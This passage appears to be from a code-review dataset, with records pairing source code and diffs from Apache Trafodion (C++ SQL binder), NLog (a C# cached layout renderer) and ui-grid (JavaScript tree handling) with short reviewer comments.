} Cast *retExpr = new (bindWA->wHeap()) Cast(boundExpr, &paramType, ITM_CAST, TRUE); boundExpr = retExpr->bindNode (bindWA); if ( bindWA->errStatus ()) { return; } } // Fill the ValueIdList for all the params getProcAllParamsVids().insert( boundExpr->getValueId()); // Fill the ValueIdList for Input params getProcInputParamsVids().insert( boundExpr->getValueId()); } // if INPUT or INOUT // For OUT (and INOUT) parameters, we create a NATypeToItem object, // bind it and add it to the list of OUT parameters (procOutParams_) if ( COM_OUTPUT_COLUMN == paramMode || COM_INOUT_COLUMN == paramMode ) { if (!( ITM_HOSTVAR == expr->getOperatorType () || ITM_DYN_PARAM == expr->getOperatorType ())) { #pragma nowarn(1506) // warning elimination *CmpCommon::diags() << DgSqlCode(-UDR_BINDER_OUTVAR_NOT_HV_OR_DP) << DgInt0(ordinalPosition) << DgTableName(getRoutineName().getQualifiedNameAsString()); #pragma warn(1506) // warning elimination bindWA->setErrStatus (); return; } // if NOT HOSTVAR or DYNAMIC PARAM NATypeToItem *paramTypeItem = new (bindWA->wHeap()) NATypeToItem (naColumn.mutateType()); ItemExpr *outputExprToBind = NULL; outputExprToBind = paramTypeItem->bindNode (bindWA); if ( bindWA->errStatus ()) { return; } // Fill the ValueIdList for all the params getProcAllParamsVids().insert( outputExprToBind->getValueId()); // Fill the ValueIdList for the output params addProcOutputParamsVid(outputExprToBind->getValueId ()); // // Populate our RETDesc // // It has already been alocated RETDesc *resultTable = getRETDesc(); const NAString &formalParamName = naColumn.getColName(); const NAString *colParamName = &formalParamName; // Set the userParamName const NAString &userParamName = // cannot use the boundExpr here as it will be a cast() // for the HostVar or DynamicParam. Use the original // ItemExpr pointer instead. (ITM_HOSTVAR == expr->getOperatorType()) ? ((HostVar *)expr)->getName() : ((DynamicParam *)expr)->getName(); // Typically the name for this output column will be the formal // parameter name. Exceptions: // - No formal name was specified in the CREATE PROCEDURE. Use // the (possibly empty) dynamic parameter or host variable name // instead. // - This is a JDBC or ODBC compile and the client is using a // named host variable or dynamic parameter. JDBC and ODBC want // us to use the client's name in this case. 
if (formalParamName.isNull() || (!userParamName.isNull() && (isJdbc || isOdbc))) { colParamName = &userParamName; } ColRefName *columnName = new (bindWA->wHeap()) ColRefName(*colParamName, bindWA->wHeap()); resultTable->addColumn(bindWA, *columnName, outputExprToBind->getValueId()); // // We need the following line for static cursor declaration, // according to a comment in bindRowValues() // cmpCurrentContext->saveRetrievedCols_ = resultTable->getDegree(); } // if OUTPUT or INOUT } // setInOrOutParam CollIndex RelRoutine::countSuppliedParams (ItemExpr *tree) const { CollIndex numParams=0; if ( !tree ) return 0; if (ITM_ITEM_LIST == tree->getOperatorType ()) { numParams += countSuppliedParams (tree->child (0)); numParams += countSuppliedParams (tree->child (1)); } else numParams++; return numParams; } // RelRoutine::countSuppliedParams void RelRoutine::gatherParamValueIds (const ItemExpr *tree, ValueIdList &paramsList) const { if ( !tree ) return; if (ITM_ITEM_LIST == tree->getOperatorType ()) { gatherParamValueIds (tree->child (0), paramsList); gatherParamValueIds (tree->child (1), paramsList); } else paramsList.insert(tree->getValueId()); } // RelRoutine::gatherParamValueIds void ProxyFunc::createProxyFuncTableDesc(BindWA *bindWA, CorrName &corrName) { // Map column definitions into a desc_struct desc_struct *tableDesc = createVirtualTableDesc(); // Map the desc_struct into an NATable. This will also add an // NATable entry into the bindWA's NATableDB. NATable *naTable = bindWA->getNATable(corrName, FALSE /*catmanUsages*/, tableDesc); if (bindWA->errStatus()) return; // Allocate a TableDesc and attach it to this RelExpr instance setTableDesc(bindWA->createTableDesc(naTable, corrName)); if (bindWA->errStatus()) return; // Allocate a RETDesc and attach it to this and the BindScope setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, getTableDesc())); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); } RelExpr *ProxyFunc::bindNode(BindWA *bindWA) { // This method now serves as a common bind node for SPProxy and // ExtractSource classes, where we before had SPProxyFunc::bindNode() // and ExtractSource::bindNode(). if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Bind the child nodes bindChildren(bindWA); if (bindWA->errStatus()) return this; // Declare a correlation name that is unique within this query switch (getOperatorType()) { case REL_EXTRACT_SOURCE: virtualTableName_ = "EXTRACT_SOURCE_"; break; case REL_SP_PROXY: virtualTableName_ = "SP_RESULT_SET_"; break; default: CMPASSERT(0); break; } virtualTableName_ += bindWA->fabricateUniqueName(); CorrName corrName(getVirtualTableName()); corrName.setSpecialType(ExtendedQualName::VIRTUAL_TABLE); createProxyFuncTableDesc(bindWA, corrName); if (bindWA->errStatus()) return this; // Bind the base class RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; // Assign the set of columns that belong to the virtual table // as the output values that can be produced by this node. 
getGroupAttr()->addCharacteristicOutputs(getTableDesc()->getColumnList()); return boundExpr; } // ProxyFunc::bindNode() RelExpr *TableMappingUDF::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Create NARoutine object (no caching for TMUDF) NARoutine *tmudfRoutine =NULL; CorrName& tmfuncName = getUserTableName(); tmfuncName.setSpecialType(ExtendedQualName::VIRTUAL_TABLE); QualifiedName name = getRoutineName(); const SchemaName &defaultSchema = bindWA->getSchemaDB ()->getDefaultSchema(); name.applyDefaults(defaultSchema); setRoutineName(name); // Return an error if an unsupported catalog is being used. if ((NOT name.isSeabase()) && (NOT name.isHive())) { *CmpCommon::diags() << DgSqlCode(-1002) << DgCatalogName(name.getCatalogName()) << DgString0(""); bindWA->setErrStatus(); return NULL; } Lng32 diagsMark = CmpCommon::diags()->mark(); NABoolean errStatus = bindWA->errStatus(); tmudfRoutine = getRoutineMetadata(name, tmfuncName, bindWA); if (tmudfRoutine == NULL) { // this could be a predefined TMUDF, which is not // recorded in the metadata at this time OperatorTypeEnum opType = PredefinedTableMappingFunction::nameIsAPredefinedTMF(tmfuncName); if (opType != REL_TABLE_MAPPING_UDF) { // yes, this is a predefined TMUDF PredefinedTableMappingFunction *result; // discard the errors from the failed name lookup CmpCommon::diags()->rewind(diagsMark); if (!errStatus) bindWA->resetErrStatus(); // create a new RelExpr result = new(bindWA->wHeap()) PredefinedTableMappingFunction( tmfuncName, const_cast<ItemExpr *>(getProcAllParamsTree()), opType); // copy data members of the base classes TableMappingUDF::copyTopNode(result); // set children result->setArity(getArity()); for (int i=0; i<getArity(); i++) result->child(i) = child(i); // Abandon the current node and return the bound new node. // Next time it will reach this method it will call an // overloaded getRoutineMetadata() that will succeed. return result->bindNode(bindWA); } // getRoutineMetadata has already set the diagnostics area // and set the error status CMPASSERT(bindWA->errStatus()); return NULL; } // Bind the child nodes. 
bindChildren(bindWA); if (bindWA->errStatus()) return this; // Use information from child to populate childInfo_ NAHeap *heap = CmpCommon::statementHeap(); for(Int32 i = 0; i < getArity(); i++) { NAString childName(heap); NAColumnArray childColumns(heap) ; RETDesc *childRetDesc = child(i)->getRETDesc(); // Get Name LIST(CorrName*) nameList; childRetDesc->getXTNM().dumpKeys(nameList); if (nameList.entries() == 1) { childName = (nameList[0])->getExposedNameAsString(); } else { childName = "_inputTable" + bindWA->fabricateUniqueName(); } // ask for histograms of all child outputs, since we don't // know what the UDF will need and what predicates exist // on passthru columns of the UDF bindWA->getCurrentScope()->context()->inWhereClause() = TRUE; // Get NAColumns CollIndex numChildCols = childRetDesc->getColumnList()->entries(); for(CollIndex j=0; j < numChildCols; j++) { NAColumn * childCol = new (heap) NAColumn( childRetDesc->getColRefNameObj(j).getColName().data(), j, childRetDesc->getType(j).newCopy(heap), heap); childColumns.insert(childCol); bindWA->markAsReferencedColumn(childRetDesc->getValueId(j)); } bindWA->getCurrentScope()->context()->inWhereClause() = FALSE; // get child root CMPASSERT(child(i)->getOperator().match(REL_ROOT) || child(i)->getOperator().match(REL_RENAME_TABLE)); RelRoot * myChild; if (child(i)->getOperator().match(REL_RENAME_TABLE)) myChild = (RelRoot *) (child(i)->child(0).getPtr()); else myChild = (RelRoot *) child(i).getPtr(); // output vidList from child RetDesc, // can also get from child Root compExpr ValueIdList vidList; childRetDesc->getValueIdList(vidList, USER_COLUMN); ValueIdSet childPartition(myChild->partitionArrangement()); ValueIdList childOrder(myChild->reqdOrder()); // request multi-column histograms for the PARTITION BY columns bindWA->getCurrentScope()->context()->inGroupByClause() = TRUE; // replace 1-based ordinals in the child's partition by / order by with // actual columns for (ValueId cp=childPartition.init(); childPartition.next(cp); childPartition.advance(cp)) { NABoolean negate; ConstValue *cv = cp.getItemExpr()->castToConstValue(negate); if (cv && cv->canGetExactNumericValue()) { Lng32 scale = 0; Int64 ordinal = cv->getExactNumericValue(scale); if (!negate && scale == 0 && ordinal >= 1 && ordinal <= vidList.entries()) { // remove this ValueId from the set and add the corresponding // column value. 
Note that this won't cause problems with the // iterator through the set, since we don't need to apply // this conversion on the new element we are inserting childPartition -= cp; childPartition += vidList[ordinal-1]; } else { *CmpCommon::diags() << DgSqlCode(-11154) << DgInt0(ordinal) << DgString0("PARTITION BY") << DgInt1(vidList.entries()); bindWA->setErrStatus(); return NULL; } } bindWA->markAsReferencedColumn(cp); } bindWA->getCurrentScope()->context()->inGroupByClause() = FALSE; for (CollIndex co=0; co<childOrder.entries(); co++) { NABoolean negate; ItemExpr *ie = childOrder[co].getItemExpr(); ConstValue *cv = NULL; if (ie->getOperatorType() == ITM_INVERSE) ie = ie->child(0); cv = ie->castToConstValue(negate); if (cv && cv->canGetExactNumericValue()) { Lng32 scale = 0; Int64 ordinal = cv->getExactNumericValue(scale); // replace the const value with the actual column if (!negate && scale == 0 && ordinal >= 1 && ordinal <= vidList.entries()) if (ie == childOrder[co].getItemExpr()) { // ascending order childOrder[co] = vidList[ordinal-1]; } else { // desc order, need to add an InverseOrder on top ItemExpr *inv = new(bindWA->wHeap()) InverseOrder( vidList[ordinal-1].getItemExpr()); inv->synthTypeAndValueId(); childOrder[co] = inv->getValueId(); } else { *CmpCommon::diags() << DgSqlCode(-11154) << DgInt0(ordinal) << DgString0("ORDER BY") << DgInt1(vidList.entries()); bindWA->setErrStatus(); return NULL; } } } TableMappingUDFChildInfo * cInfo = new (heap) TableMappingUDFChildInfo( childName, childColumns, myChild->getPartReqType(), childPartition, childOrder, vidList); childInfo_.insert(cInfo); } RoutineDesc *tmudfRoutineDesc = new (bindWA->wHeap()) RoutineDesc(bindWA, tmudfRoutine); if (tmudfRoutineDesc == NULL || bindWA->errStatus ()) { // Error bindWA->setBindingCall (FALSE); bindWA->setErrStatus (); return this; } setRoutineDesc(tmudfRoutineDesc); // xcnm will be empty because the routineDesc does not contain any // output columns yet RETDesc *rDesc = new (bindWA->wHeap()) RETDesc(bindWA, tmudfRoutineDesc); bindWA->getCurrentScope()->setRETDesc(rDesc); setRETDesc(rDesc); dllInteraction_ = new (bindWA->wHeap()) TMUDFDllInteraction(); // ValueIDList of the actual input parameters // (tmudfRoutine has formal parameters) if (getProcAllParamsTree() && (getProcAllParamsVids().isEmpty() == TRUE)) { ((ItemExpr *)getProcAllParamsTree())->convertToValueIdList( getProcAllParamsVids(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return NULL; // Clear the Tree since we now have gotten vids for all the parameters. setProcAllParamsTree(NULL); } getProcInputParamsVids().insert(getProcAllParamsVids()); // invoke the optional UDF compiler interface or a default // implementation to validate scalar inputs and produce a list of // output columns NABoolean status = dllInteraction_->describeParamsAndMaxOutputs(this, bindWA); if (!status) { bindWA->setErrStatus(); return NULL; } checkAndCoerceScalarInputParamTypes(bindWA); if (bindWA->errStatus()) return NULL; createOutputVids(bindWA); if (bindWA->errStatus()) return NULL; // create a ValueIdMap that allows us to translate // output columns that are passed through back to // input columns (outputs of the child), this can // be used to push down predicates, translate // required order and partitioning, etc. 
status = dllInteraction_->createOutputInputColumnMap( this, udfOutputToChildInputMap_); if (!status) { bindWA->setErrStatus(); return NULL; } // if this is a maintenance-type operation that must run on // all nodes of the cluster or must run in parallel, regardless // of the ATTEMPT_ESP_PARALLELISM CQD, then set a flag in the // root node if (getOperatorType() == REL_TABLE_MAPPING_BUILTIN_LOG_READER) bindWA->getTopRoot()->setMustUseESPs(TRUE); // add the routine to the UdrStoiList. The UdrStoi list is used // to check valid privileges LIST(OptUdrOpenInfo *) udrList = bindWA->getUdrStoiList (); ULng32 numUdrs = udrList.entries(); NABoolean udrReferenced = FALSE; // See if UDR already exists for (ULng32 stoiIndex = 0; stoiIndex < numUdrs; stoiIndex++) { if ( 0 == udrList[stoiIndex]->getUdrName().compareTo( getRoutineName().getQualifiedNameAsAnsiString() ) ) { udrReferenced = TRUE; break; } } // UDR has not been defined, go ahead an add one if ( FALSE == udrReferenced ) { SqlTableOpenInfo *udrStoi = new (bindWA->wHeap ())SqlTableOpenInfo (); udrStoi->setAnsiName ( convertNAString( getRoutineName().getQualifiedNameAsAnsiString(), bindWA->wHeap ()) ); OptUdrOpenInfo *udrOpenInfo = new (bindWA->wHeap ()) OptUdrOpenInfo( udrStoi , getRoutineName().getQualifiedNameAsAnsiString() , (NARoutine *)getNARoutine() ); bindWA->getUdrStoiList().insert(udrOpenInfo); } RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return NULL; return boundExpr; } RelExpr * FastExtract::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // check validity of target location if (getTargetType() == FILE) { char reasonMsg[256]; NABoolean raiseError = FALSE; if ((unsigned char)(getTargetName().data()[0]) != SLASH_C) { raiseError = TRUE; sprintf(reasonMsg,"Relative path name was used"); } else if (getTargetName().length() > 512) { raiseError = TRUE; sprintf(reasonMsg,"Length exceeds 512 characters"); } else { char * sqroot = getenv("MY_SQROOT"); if (sqroot && (! CmpCommon::context()->getSqlmxRegress()) && (strncmp(sqroot, getTargetName().data(),strlen(sqroot)) == 0)) { raiseError = TRUE; sprintf(reasonMsg,"Database system directory was used"); } } if (raiseError && strncmp(getTargetName().data(),"hdfs://",7) != 0 ) { *CmpCommon::diags() << DgSqlCode(-4378) << DgString0(reasonMsg) ; bindWA->setErrStatus(); return NULL; } } if (getDelimiter().length() == 0) { delimiter_ = ActiveSchemaDB()->getDefaults().getValue(TRAF_UNLOAD_DEF_DELIMITER); } if (getNullString().length() == 0) { nullString_ = ActiveSchemaDB()->getDefaults().getValue(TRAF_UNLOAD_DEF_NULL_STRING); } if (getRecordSeparator().length() == 0) { recordSeparator_ = ActiveSchemaDB()->getDefaults().getValue(TRAF_UNLOAD_DEF_RECORD_SEPARATOR); } if (!isHiveInsert()) { bindWA->setIsFastExtract(); } // Bind the child nodes. 
bindChildren(bindWA); if (bindWA->errStatus()) return this; // Use information from child to populate childInfo_ NAHeap *heap = CmpCommon::statementHeap(); RETDesc *childRETDesc = child(0)->getRETDesc(); // output vidList from child RetDesc, // can also get from child Root compExpr ValueIdList vidList; childRETDesc->getValueIdList(vidList, USER_COLUMN); setSelectList(vidList); if (includeHeader()) { const ColumnDescList &columnsRET = *(childRETDesc->getColumnList()); for (CollIndex i = 0; i < columnsRET.entries(); i++) { if (columnsRET[i]->getHeading()) header_ += columnsRET[i]->getHeading(); else if (!(columnsRET[i]->getColRefNameObj().isEmpty())) header_ += columnsRET[i]->getColRefNameObj().getColName(); else header_ += "EXPR"; if (i < (columnsRET.entries() -1)) { header_ += " "; header_ += delimiter_; header_ += " "; } } } else { header_ = "NO_HEADER" ; } // no rows are returned from this operator. // Allocate an empty RETDesc and attach it to this and the BindScope. setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA)); RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return NULL; return boundExpr; } RelExpr * ControlRunningQuery::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // // Check to see if user is authorized to control this query. // if (!isUserAuthorized(bindWA)) return NULL; // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // no rows are returned from this operator. // Allocate an empty RETDesc and attach it to this and the BindScope. // setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA)); // // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; ValueIdSet ov; getPotentialOutputValues(ov); getGroupAttr()->addCharacteristicOutputs(ov); return boundExpr; } // ControlRunningQuery::bindNode() bool ControlRunningQuery::isUserAuthorized(BindWA *bindWA) { bool userHasPriv = false; Int32 sessionID = ComUser::getSessionUser(); // Check to see if the current user owns the query id. // This only has to be done for the Cancel query request. // This option to check privilege is not available unless // the query Id was supplied. if ((action_ == Cancel) && (qs_ == ControlQid)) { // The user ID associated with the query is stored in the QID. // To be safe, copy the QID to a character string. Int32 qidLen = queryId_.length(); char *pQid = new (bindWA->wHeap()) char[qidLen+1]; str_cpy_all(pQid, queryId_.data(), qidLen); pQid[qidLen] = '\0'; // Set up the returned parameters // Max username can be (128 * 2) + 2 (delimiters) + 1 (null indicator) char username[2 * MAX_USERNAME_LEN + 2 + 1]; Int64 usernameLen = sizeof(username) - 1; // Call function to extract the username from the QID Int32 retcode = ComSqlId::getSqlQueryIdAttr(ComSqlId::SQLQUERYID_USERNAME, pQid, qidLen, usernameLen, &username[0]); if (retcode == 0) { // The username stored in the QID is actually the userID preceeded with // a "U". Check for a U and convert the succeeding characters // to integer. This integer value is compared against the current userID. 
username[usernameLen] = '\0'; if (username[0] == 'U') { Int64 userID = str_atoi(&username[1],usernameLen - 1); if (sessionID == userID || sessionID == ComUser::getRootUserID()) userHasPriv = true; } // If userName does not begin with a 'U', ignore and continue } // If retcode != 0, continue, an invalid QID could be specified which // is checked later in the code } // The current user does not own the query, see if the current user has // the correct QUERY privilege. Code above only supports cancel, but other // checks could be added. Component checks for all query operations. if (!userHasPriv) { SQLOperation operation; switch (ControlRunningQuery::action_) { case ControlRunningQuery::Suspend: operation = SQLOperation::QUERY_SUSPEND; break; case ControlRunningQuery::Activate: operation = SQLOperation::QUERY_ACTIVATE; break; case ControlRunningQuery::Cancel: operation = SQLOperation::QUERY_CANCEL; break; default: operation = SQLOperation::UNKNOWN; } NAString privMDLoc = CmpSeabaseDDL::getSystemCatalogStatic(); privMDLoc += ".\""; privMDLoc += SEABASE_PRIVMGR_SCHEMA; privMDLoc += "\""; PrivMgrComponentPrivileges componentPriv( privMDLoc.data(),CmpCommon::diags()); userHasPriv = componentPriv.hasSQLPriv(sessionID,operation,true); if (!userHasPriv) { // ANSI requests a special SqlState for cancel requests if (ControlRunningQuery::action_ == ControlRunningQuery::Cancel) *CmpCommon::diags() << DgSqlCode(-8029); else *CmpCommon::diags() << DgSqlCode(-1017); bindWA->setErrStatus(); } if (bindWA->errStatus()) return false; } return true; }// ControlRunningQuery::isUserAuthorized() RelExpr * OSIMControl::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } //Create OptimizerSimulator if this is called the first time. if(!CURRCONTEXT_OPTSIMULATOR) CURRCONTEXT_OPTSIMULATOR = new(CTXTHEAP) OptimizerSimulator(CTXTHEAP); //in response to the force option of osim load, //e.g. osim load from '/xxx/xxx/osim-dir', force //if true, when loading osim tables/views/indexes //existing objects with the same qualified name //will be dropped first CURRCONTEXT_OPTSIMULATOR->setForceLoad(isForceLoad()); //Set OSIM mode if(!CURRCONTEXT_OPTSIMULATOR->setOsimModeAndLogDir(targetMode_, osimLocalDir_.data())) { bindWA->setErrStatus(); return this; } return ControlAbstractClass::bindNode(bindWA); }
1
8,354
Does this mean we cannot update statistics with sampling on a table with LOB columns?
apache-trafodion
cpp
@@ -47,7 +47,18 @@ namespace NLog.LayoutRenderers.Wrappers [ThreadAgnostic] public sealed class CachedLayoutRendererWrapper : WrapperLayoutRendererBase { - private string cachedValue; + /// <summary> + /// A value indicating when the cache is cleared. + /// </summary> + public enum ClearCacheOption + { + /// <summary>Never clear the cache.</summary> + Never = 0, + /// <summary>Clear the cache whenever the <see cref="CachedLayoutRendererWrapper"/> is initialized.</summary> + OnInitialize = 1 + } + + private string cachedValue = null; /// <summary> /// Initializes a new instance of the <see cref="CachedLayoutRendererWrapper"/> class.
1
// // Copyright (c) 2004-2011 Jaroslaw Kowalski <[email protected]> // // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // * Neither the name of Jaroslaw Kowalski nor the names of its // contributors may be used to endorse or promote products derived from this // software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF // THE POSSIBILITY OF SUCH DAMAGE. // namespace NLog.LayoutRenderers.Wrappers { using System.ComponentModel; using NLog.Config; /// <summary> /// Applies caching to another layout output. /// </summary> /// <remarks> /// The value of the inner layout will be rendered only once and reused subsequently. /// </remarks> [LayoutRenderer("cached")] [AmbientProperty("Cached")] [ThreadAgnostic] public sealed class CachedLayoutRendererWrapper : WrapperLayoutRendererBase { private string cachedValue; /// <summary> /// Initializes a new instance of the <see cref="CachedLayoutRendererWrapper"/> class. /// </summary> public CachedLayoutRendererWrapper() { this.Cached = true; } /// <summary> /// Gets or sets a value indicating whether this <see cref="CachedLayoutRendererWrapper"/> is enabled. /// </summary> /// <docgen category='Caching Options' order='10' /> [DefaultValue(true)] public bool Cached { get; set; } /// <summary> /// Initializes the layout renderer. /// </summary> protected override void InitializeLayoutRenderer() { base.InitializeLayoutRenderer(); this.cachedValue = null; } /// <summary> /// Closes the layout renderer. /// </summary> protected override void CloseLayoutRenderer() { base.CloseLayoutRenderer(); this.cachedValue = null; } /// <summary> /// Transforms the output of another layout. /// </summary> /// <param name="text">Output to be transform.</param> /// <returns>Transformed text.</returns> protected override string Transform(string text) { return text; } /// <summary> /// Renders the inner layout contents. /// </summary> /// <param name="logEvent">The log event.</param> /// <returns>Contents of inner layout.</returns> protected override string RenderInner(LogEventInfo logEvent) { if (this.Cached) { if (this.cachedValue == null) { this.cachedValue = base.RenderInner(logEvent); } return this.cachedValue; } else { return base.RenderInner(logEvent); } } } }
1
11,772
Looks good, but I think a `[Flags]` enum would be more future-proof. Although I'm not sure whether a flags enum works from the XML config. What do you think?
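A minimal sketch of what the suggested `[Flags]` variant could look like; the member names, numeric values, and the extra OnClose trigger are assumptions for illustration only, not part of the actual patch or the NLog API:

using System;

namespace NLog.LayoutRenderers.Wrappers
{
    // Hypothetical sketch: a [Flags] version of the proposed cache-clearing option,
    // where combinable powers of two leave room for future triggers.
    [Flags]
    public enum ClearCacheOption
    {
        /// <summary>Never clear the cache.</summary>
        None = 0,

        /// <summary>Clear the cache when the wrapper is initialized.</summary>
        OnInit = 1,

        /// <summary>Clear the cache when the wrapper is closed (assumed future trigger).</summary>
        OnClose = 2
    }
}

Whether a combined value such as "OnInit,OnClose" can be assigned from the XML config depends on how NLog parses enum-typed properties, which is the open question raised in the comment above.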
NLog-NLog
.cs
@@ -1577,6 +1577,16 @@ require: '^uiGrid', link: function($scope, $elm, $attrs, uiGridCtrl) { var self = uiGridCtrl.grid; + $scope.treeButtonClass = function(row) { + if ( ( self.options.showTreeExpandNoChildren && row.treeLevel > -1 ) || ( row.treeNode.children && row.treeNode.children.length > 0 ) ) { + if (row.treeNode.state === 'expanded' ) { + return 'ui-grid-icon-minus-squared'; + } + if (row.treeNode.state === 'collapsed' ) { + return 'ui-grid-icon-plus-squared'; + } + } + }; $scope.treeButtonClick = function(row, evt) { evt.stopPropagation(); uiGridTreeBaseService.toggleRowTreeState(self, row, evt);
1
(function () { 'use strict'; /** * @ngdoc overview * @name ui.grid.treeBase * @description * * # ui.grid.treeBase * * <div class="alert alert-warning" role="alert"><strong>Beta</strong> This feature is ready for testing, but it either hasn't seen a lot of use or has some known bugs.</div> * * This module provides base tree handling functions that are shared by other features, notably grouping * and treeView. It provides a tree view of the data, with nodes in that * tree and leaves. * * Design information: * ------------------- * * The raw data that is provided must come with a $$treeLevel on any non-leaf node. Grouping will create * these on all the group header rows, treeView will expect these to be set in the raw data by the user. * TreeBase will run a rowsProcessor that: * - builds `treeBase.tree` out of the provided rows * - permits a recursive sort of the tree * - maintains the expand/collapse state of each node * - provides the expand/collapse all button and the expand/collapse buttons * - maintains the count of children for each node * * Each row is updated with a link to the tree node that represents it. Refer {@link ui.grid.treeBase.grid:treeBase.tree tree documentation} * for information. * * TreeBase adds information to the rows * - treeLevel: if present and > -1 tells us the level (level 0 is the top level) * - treeNode: pointer to the node in the grid.treeBase.tree that refers * to this row, allowing us to manipulate the state * * Since the logic is baked into the rowsProcessors, it should get triggered whenever * row order or filtering or anything like that is changed. We recall the expanded state * across invocations of the rowsProcessors by the reference to the treeNode on the individual * rows. We rebuild the tree itself quite frequently, when we do this we use the saved treeNodes to * get the state, but we overwrite the other data in that treeNode. * * By default rows are collapsed, which means all data rows have their visible property * set to false, and only level 0 group rows are set to visible. * * We rely on the rowsProcessors to do the actual expanding and collapsing, so we set the flags we want into * grid.treeBase.tree, then call refresh. This is because we can't easily change the visible * row cache without calling the processors, and once we've built the logic into the rowProcessors we may as * well use it all the time. * * Tree base provides sorting (on non-grouped columns). * * Sorting works in two passes. The standard sorting is performed for any columns that are important to building * the tree (for example, any grouped columns). Then after the tree is built, a recursive tree sort is performed * for the remaining sort columns (including the original sort) - these columns are sorted within each tree level * (so all the level 1 nodes are sorted, then all the level 2 nodes within each level 1 node etc). * * To achieve this we make use of the `ignoreSort` property on the sort configuration. The parent feature (treeView or grouping) * must provide a rowsProcessor that runs with very low priority (typically in the 60-65 range), and that sets * the `ignoreSort`on any sort that it wants to run on the tree. TreeBase will clear the ignoreSort on all sorts - so it * will turn on any sorts that haven't run. It will then call a recursive sort on the tree. * * Tree base provides treeAggregation. It checks the treeAggregation configuration on each column, and aggregates based on * the logic provided as it builds the tree. 
Footer aggregation from the uiGrid core should not be used with treeBase aggregation, * since it operates on all visible rows, as opposed to to leaf nodes only. Setting `showColumnFooter: true` will show the * treeAggregations in the column footer. Aggregation information will be collected in the format: * * ``` * { * type: 'count', * value: 4, * label: 'count: ', * rendered: 'count: 4' * } * ``` * * A callback is provided to format the value once it is finalised (aka a valueFilter). * * <br/> * <br/> * * <div doc-module-components="ui.grid.treeBase"></div> */ var module = angular.module('ui.grid.treeBase', ['ui.grid']); /** * @ngdoc object * @name ui.grid.treeBase.constant:uiGridTreeBaseConstants * * @description constants available in treeBase module. * * These constants are manually copied into grouping and treeView, * as I haven't found a way to simply include them, and it's not worth * investing time in for something that changes very infrequently. * */ module.constant('uiGridTreeBaseConstants', { featureName: "treeBase", rowHeaderColName: 'treeBaseRowHeaderCol', EXPANDED: 'expanded', COLLAPSED: 'collapsed', aggregation: { COUNT: 'count', SUM: 'sum', MAX: 'max', MIN: 'min', AVG: 'avg' } }); /** * @ngdoc service * @name ui.grid.treeBase.service:uiGridTreeBaseService * * @description Services for treeBase feature */ /** * @ngdoc object * @name ui.grid.treeBase.api:ColumnDef * * @description ColumnDef for tree feature, these are available to be * set using the ui-grid {@link ui.grid.class:GridOptions.columnDef gridOptions.columnDefs} */ module.service('uiGridTreeBaseService', ['$q', 'uiGridTreeBaseConstants', 'gridUtil', 'GridRow', 'gridClassFactory', 'i18nService', 'uiGridConstants', 'rowSorter', function ($q, uiGridTreeBaseConstants, gridUtil, GridRow, gridClassFactory, i18nService, uiGridConstants, rowSorter) { var service = { initializeGrid: function (grid, $scope) { //add feature namespace and any properties to grid for needed /** * @ngdoc object * @name ui.grid.treeBase.grid:treeBase * * @description Grid properties and functions added for treeBase */ grid.treeBase = {}; /** * @ngdoc property * @propertyOf ui.grid.treeBase.grid:treeBase * @name numberLevels * * @description Total number of tree levels currently used, calculated by the rowsProcessor by * retaining the highest tree level it sees */ grid.treeBase.numberLevels = 0; /** * @ngdoc property * @propertyOf ui.grid.treeBase.grid:treeBase * @name expandAll * * @description Whether or not the expandAll box is selected */ grid.treeBase.expandAll = false; /** * @ngdoc property * @propertyOf ui.grid.treeBase.grid:treeBase * @name tree * * @description Tree represented as a nested array that holds the state of each node, along with a * pointer to the row. 
